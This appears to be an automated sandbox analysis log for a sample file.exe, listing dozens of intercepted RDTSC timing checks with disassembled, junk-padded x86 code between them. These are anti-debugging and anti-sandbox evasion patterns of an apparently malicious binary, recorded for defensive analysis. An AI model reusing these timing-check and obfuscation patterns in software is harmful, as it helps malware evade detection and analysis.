Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0187 second address: 4AD018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF0CBF second address: 4AF0CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d mov ch, DEh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAF7914BED1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF0CEF second address: 4AF0D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007FAF78D3F533h 0x0000000b and esi, 714FFB5Eh 0x00000011 jmp 00007FAF78D3F539h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FAF78D3F533h 0x00000024 add ecx, 70AC956Eh 0x0000002a jmp 00007FAF78D3F539h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF079B second address: 4AF07A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF07A1 second address: 4AF07E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FAF78D3F52Dh 0x00000015 add cx, 9816h 0x0000001a jmp 00007FAF78D3F531h 0x0000001f popfd 0x00000020 mov cx, 2287h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF07E7 second address: 4AF07ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF07ED second address: 4AF07F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF07F1 second address: 4AF07F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF07F5 second address: 4AF082D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b call 00007FAF78D3F531h 0x00000010 pop edx 0x00000011 mov edi, esi 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FAF78D3F535h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF0531 second address: 4AF056D instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FAF7914BED5h 0x0000000d or si, F366h 0x00000012 jmp 00007FAF7914BED1h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF056D second address: 4AF0571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF0571 second address: 4AF0577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF0577 second address: 4AF05DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FAF78D3F52Ah 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FAF78D3F530h 0x00000014 mov ebp, esp 0x00000016 jmp 00007FAF78D3F530h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FAF78D3F52Dh 0x00000025 adc ah, FFFFFF86h 0x00000028 jmp 00007FAF78D3F531h 0x0000002d popfd 0x0000002e mov ecx, 0AD05937h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B003F9 second address: 4B0043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FAF7914BED4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007FAF7914BECDh 0x00000019 pop eax 0x0000001a call 00007FAF7914BED1h 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0043D second address: 4B00443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B00443 second address: 4B00447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B105B1 second address: 4B105B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B105B5 second address: 4B105BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B105BB second address: 4B105C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B105C1 second address: 4B105C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B105C5 second address: 4B105F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FAF78D3F52Dh 0x0000000e mov ebp, esp 0x00000010 jmp 00007FAF78D3F52Eh 0x00000015 mov eax, dword ptr [ebp+08h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edi, cx 0x0000001e mov si, F555h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF071C second address: 4AF0736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, ebx 0x00000010 movsx ebx, ax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B100C7 second address: 4B100D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 mov ax, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B100D9 second address: 4B100F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B100F7 second address: 4B10102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B10102 second address: 4B10149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushfd 0x00000007 jmp 00007FAF7914BECAh 0x0000000c and ecx, 237E1758h 0x00000012 jmp 00007FAF7914BECBh 0x00000017 popfd 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ah, A6h 0x00000021 pushfd 0x00000022 jmp 00007FAF7914BECDh 0x00000027 jmp 00007FAF7914BECBh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1036B second address: 4B10424 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAF78D3F52Ch 0x00000013 add eax, 07513D58h 0x00000019 jmp 00007FAF78D3F52Bh 0x0000001e popfd 0x0000001f mov si, E20Fh 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FAF78D3F530h 0x0000002d xor ax, 47B8h 0x00000032 jmp 00007FAF78D3F52Bh 0x00000037 popfd 0x00000038 mov edi, esi 0x0000003a popad 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FAF78D3F537h 0x00000045 sbb ecx, 5470662Eh 0x0000004b jmp 00007FAF78D3F539h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007FAF78D3F530h 0x00000057 sub ecx, 3379E3A8h 0x0000005d jmp 00007FAF78D3F52Bh 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B10424 second address: 4B1042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1042A second address: 4B1042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1042E second address: 4B10432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B306F9 second address: 4B3071E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF78D3F52Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3071E second address: 4B3072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7914BECCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3072E second address: 4B30745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F52Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30745 second address: 4B3074C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3074C second address: 4B307FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF78D3F533h 0x00000009 and cx, 29DEh 0x0000000e jmp 00007FAF78D3F539h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FAF78D3F530h 0x0000001a sbb ecx, 24B8E1D8h 0x00000020 jmp 00007FAF78D3F52Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ecx 0x0000002a jmp 00007FAF78D3F536h 0x0000002f mov eax, dword ptr [76FB65FCh] 0x00000034 jmp 00007FAF78D3F530h 0x00000039 test eax, eax 0x0000003b jmp 00007FAF78D3F530h 0x00000040 je 00007FAFEB1426A6h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FAF78D3F52Ah 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B307FA second address: 4B307FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B307FE second address: 4B30804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30804 second address: 4B30831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007FAF7914BED0h 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30831 second address: 4B30835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30835 second address: 4B30839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30839 second address: 4B3083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3083F second address: 4B3086A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF7914BECDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3086A second address: 4B308DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAF78D3F52Ch 0x00000012 adc al, 00000018h 0x00000015 jmp 00007FAF78D3F52Bh 0x0000001a popfd 0x0000001b mov ax, BBCFh 0x0000001f popad 0x00000020 leave 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FAF78D3F530h 0x00000028 sbb cl, 00000078h 0x0000002b jmp 00007FAF78D3F52Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FAF78D3F536h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B308DD second address: 4B30903 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 retn 0004h 0x0000000a nop 0x0000000b mov esi, eax 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 xor esi, dword ptr [00D32014h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c push eax 0x0000001d call 00007FAF7CF8C7BDh 0x00000022 push FFFFFFFEh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FAF7914BED6h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30903 second address: 4B30909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30909 second address: 4B30942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF7914BECCh 0x00000009 adc eax, 457AE668h 0x0000000f jmp 00007FAF7914BECBh 0x00000014 popfd 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FAF7914BECEh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30942 second address: 4B30948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30948 second address: 4B30984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ret 0x0000000c nop 0x0000000d push eax 0x0000000e call 00007FAF7CF8C82Bh 0x00000013 mov edi, edi 0x00000015 pushad 0x00000016 mov eax, 23B33ED3h 0x0000001b mov di, si 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FAF7914BED2h 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov edx, 2FFD2822h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B30984 second address: 4B309AF instructions: 0x00000000 rdtsc 0x00000002 mov bh, A4h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov cx, di 0x0000000c call 00007FAF78D3F533h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B309AF second address: 4B309B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B309B5 second address: 4B309BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B309BB second address: 4B309E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF7914BED5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE001F second address: 4AE0025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0025 second address: 4AE005B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAF7914BECBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAF7914BED5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE005B second address: 4AE0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0078 second address: 4AE008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE008B second address: 4AE010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF78D3F52Fh 0x00000008 pushfd 0x00000009 jmp 00007FAF78D3F538h 0x0000000e adc esi, 2D4BD7F8h 0x00000014 jmp 00007FAF78D3F52Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and esp, FFFFFFF8h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ecx, ebx 0x00000025 pushfd 0x00000026 jmp 00007FAF78D3F537h 0x0000002b adc eax, 02B8386Eh 0x00000031 jmp 00007FAF78D3F539h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE010C second address: 4AE0184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d mov ah, EFh 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FAF7914BED2h 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FAF7914BECEh 0x0000001e sub si, 6178h 0x00000023 jmp 00007FAF7914BECBh 0x00000028 popfd 0x00000029 mov ecx, 0971A0AFh 0x0000002e popad 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007FAF7914BED7h 0x00000038 mov esi, 6B6D228Fh 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0184 second address: 4AE0198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF78D3F530h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0198 second address: 4AE01C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF7914BED4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE01C0 second address: 4AE01C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE01C6 second address: 4AE01CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE01CA second address: 4AE01FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAF78D3F532h 0x00000012 or ecx, 5765EAF8h 0x00000018 jmp 00007FAF78D3F52Bh 0x0000001d popfd 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE01FF second address: 4AE029D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 mov eax, edx 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FAF7914BED2h 0x00000019 mov dword ptr [esp], esi 0x0000001c pushad 0x0000001d mov esi, 1BB055CDh 0x00000022 pushfd 0x00000023 jmp 00007FAF7914BECAh 0x00000028 add cx, 16E8h 0x0000002d jmp 00007FAF7914BECBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov esi, dword ptr [ebp+08h] 0x00000037 jmp 00007FAF7914BED6h 0x0000003c xchg eax, edi 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FAF7914BECDh 0x00000046 adc cx, 0BB6h 0x0000004b jmp 00007FAF7914BED1h 0x00000050 popfd 0x00000051 mov bl, al 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE029D second address: 4AE02E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F52Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAF78D3F52Bh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FAF78D3F534h 0x00000017 sub si, 5938h 0x0000001c jmp 00007FAF78D3F52Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 push esi 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE02E4 second address: 4AE031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test esi, esi 0x00000008 jmp 00007FAF7914BECEh 0x0000000d je 00007FAFEB59A1E1h 0x00000013 pushad 0x00000014 mov si, C22Dh 0x00000018 mov ch, 54h 0x0000001a popad 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ax, 909Dh 0x00000029 mov dx, si 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE031A second address: 4AE037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAF78D3F535h 0x00000009 xor eax, 5AC393E6h 0x0000000f jmp 00007FAF78D3F531h 0x00000014 popfd 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FAFEB18D801h 0x00000020 jmp 00007FAF78D3F52Ah 0x00000025 mov edx, dword ptr [esi+44h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FAF78D3F537h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE037C second address: 4AE03F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FAF7914BECEh 0x00000011 test edx, 61000000h 0x00000017 jmp 00007FAF7914BED0h 0x0000001c jne 00007FAFEB59A18Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FAF7914BECDh 0x0000002b sub si, 5966h 0x00000030 jmp 00007FAF7914BED1h 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE03F0 second address: 4AE03F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
